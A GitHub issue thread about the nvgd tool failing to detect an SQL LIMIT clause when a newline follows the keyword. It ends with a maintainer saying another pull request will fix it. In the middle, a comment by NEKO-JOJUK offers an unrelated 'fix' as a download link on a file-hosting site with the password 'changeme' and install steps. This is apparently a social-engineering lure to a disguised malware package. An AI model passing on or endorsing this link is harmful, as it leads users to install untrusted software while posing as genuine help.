### ISSUE TITLE
SQL LIMIT clause detection fails when there is a newline after LIMIT

### ISSUE THREAD

**Issue by yuki-tsuchiya** [koron/nvgd#106]
When there is a newline immediately after the LIMIT keyword in an SQL query, the detection of the LIMIT clause fails, and the max_rows setting is incorrectly applied.

Example:
When using the db protocol, the max_rows setting is applied in the following query, but this is not the expected behavior:
```
Query:
SELECT hoge FROM piyo
LIMIT
10

URL:
http://localhost:9280/db/mysql@localhost.ladsp.net/SELECT%20hoge%20FROM%20piyo%0ALIMIT%0A10
```

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by koron** [comment]
#111 will fix this.
